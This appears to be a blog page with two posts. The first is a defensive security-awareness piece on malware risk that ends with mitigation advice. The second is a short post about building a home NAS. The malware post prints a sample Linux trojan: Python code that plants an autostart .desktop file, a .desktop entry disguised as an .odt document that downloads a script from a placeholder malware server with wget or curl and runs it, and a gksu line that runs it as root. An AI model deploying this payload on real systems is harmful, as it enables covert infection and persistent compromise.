Understanding how your network is at risk – Part 1

Your network is at risk! I can tell you that without even analyzing your network. There are threats all around you and your even a threat.

  • Your external or public network gets scanned several times a day by bad people all over the world
  • You receive malicious emails all the time in the form of spam that will lead you to Trojans and viruses.
  • Your web browsing habits make you susceptible to almost any web based attack even if your on a trusted site.

This small series will show you how you are at risk and what you can do. This guide is not complete and will not solve or even address every problem out there. This is written to help you defend properly. It’s a simple collection written for Uber Geeks and Sys Admins.

malwareMalware: Its everywhere. A 8 year old script kitty can write code that will hold your data hostage. A 21 year old college student can insert an invisible iframe in a trusted site that directs you to a malicious file which steals ftp passwords.

It can hijack your browser, redirect your search attempts, serve up nasty pop-up ads, track what web sites you visit, and generally screw things up. Malware programs are usually poorly-programmed and can cause your computer to become unbearably slow and unstable in addition to all the other havoc they wreak. Many of them will reinstall themselves even after you think you have removed them, or hide themselves deep within Windows, making them very difficult to clean.

Malware often comes bundled with other programs (Kazaa, iMesh, and other file sharing programs seem to be the biggest bundlers). These malware programs usually pop-up ads, sending revenue from the ads to the program’s authors. Others are installed from websites, pretending to be software needed to view the website. Still others, most notably some of the CoolWebSearch variants, install themselves through holes in Internet Explorer like a virus would, requiring you to do nothing but visit the wrong web page to get infected. The vast majority, however, must be installed by the user. Unfortunately, getting infected with malware is usually much easier than getting rid of it, and once you get malware on your computer it tends to multiply.

Looking at some open source malware projects its really easy to get your hands on something that will hurt you and your entire network if you do not take precautionary actions.

Using an SQL inject method (example) I can take over a site and insert code that will lead you elsewhere. I could have it automatically redirect in the background without you knowing. Malware will execute and before you know it, my program could listen to your keyboard and report the data back to my server. What’s scary is that lots of malware does the same things and it could be on your computer right now without you knowing.

Malicious emails hit your inbox all the time. Those emails can do really bad things. Take a look at this Linux Trojan that takes advantage of a flaw in Gnome and KDE environments:

import os
   relauncher_str = """
   [Desktop Entry]
   Type=Application
   Name=Malware
   Exec=python .local/.hidden/s.py
   Icon=system-run
   """
   uname = os.getlogin()
   drop_dir = “/home/%s/.config/autostart” % uname
   os.makedirs(drop_dir)
   f = open(drop_dir+”/Malware.desktop”, “w”)
   f.write(relauncher_str)
   f.close()

[Desktop Entry]
   Type=Application
   Name=some_text.odt
   Exec=bash -c ‘URL=http://www.my_malware_server.com/s.py ;
                            DROP=~/.local/.hidden ;
mkdir -p $DROP;
if [ -e /usr/bin/wget ] ;
then wget $URL -O $DROP/s.py ;
else curl $URL -o $DROP/s.py ; fi;
python $DROP/s.py’
Icon=/usr/share/icons/hicolor/48×48/apps/ooo-writer.png

Even this simple code will execute a script with root privileges

Exec=gksu python .local/.hidden/s.py

Solution:

Implement scanning in y0ur border gateway such as SNORT. Snort looks for signatures and drops packets containing those packet signatures. IPCop and pfsense utilize snort as an add-on to watch incoming and outgoing traffic.

Scan your PC for malware often. Avast and Spybot S&D are excellent software solutions. Run them both. Let SpyBot immunize you from bad sites.

Run updated AV on all clients. Symantec, need I say more.

Don’t blindly click on attachments that people have sent you. Even on Linux this advice should be taken serious.

Kill the Windows Messenger service.

Be skeptical of what you download and install. There are lots of great programs out there. Don’t install anything that looks suspicious or out of place. Research the software before installing it. Scan it, try Virus Total before you install an application or downloaded game. Don’t install a required Codec for a video that you downloaded. Use a trusted Codec pack. Verify that your Internet Explorer security settings are set correctly. Disable Active-X for un-trusted sites. Run No-Script with Firefox!

Always keep your software up to date. Run Windows Update often. Always install a Windows update. Sometimes they will be zero day patches.

And always run a firewall on every client and server. I would even block global bad IPs on the border gateway. Take a look at your hosts file after you have been immunized from SpyBot S&D, use this as a template for your border gateway.

Lastly educate your users. Internal threats are worse then external. Educate users to minimize infections and network problems.

 

 

Next Network scanning, brute force, and sniffing.

NAS Craze

NAS

If you don’t have a NAS your Crazy! What else would you store your files on in a secure location. Networked Attached Storage is expensive though. So why not build your own.

QNAP is an excellent brand when it comes to NAS devices, but the price tag is outrageous. If you wanted a 6 bay NAS that supports RAID 5 and 6 be prepared to pay above 6 hundred dollars. Can you build your own that will preform as well if not better than a device that expensive? The answer is Yes!

All you need is a RAID card such as the Highpoint 2300 or 2200, a Case that supports at least 4 Hard Disks, a motherboard and CPU, and an OS.

I run my NAS devices on Server 2008 but there is a perfect competitor that offers all of the basic features as windows in a small package. FreeNAS.  It doesn’t really matter what Case you select, as long as you like it, since most support more than 4 hard disks.

With the above scenario you can build a professional NAS for under $600, but more on this later.

Tomschaefer.org is building the perfect NAS in the next couple of months! We will show you what to buy, how to put it together, how to configure it, and what to expect. We will also show you how to get the most space and the most performance out of your built NAS while saving you hundreds of dollars.

You might be asking right now why would you need a NAS device in the house anyway, ‘I have a 2TB hard drive, that’s plenty of space”. Wrong! If that drive dies what are you going to do to retrieve you priceless pictures, files, and school work? A NAS device running RAID 5 or 6 will recover from a hard drive crash and keep your files the way you like them, working.

Look for the NAS post of Tomschaefer.org in the next couple of months that will revile the secrets the NAS devies  and what they can do for you while saving on hundreds.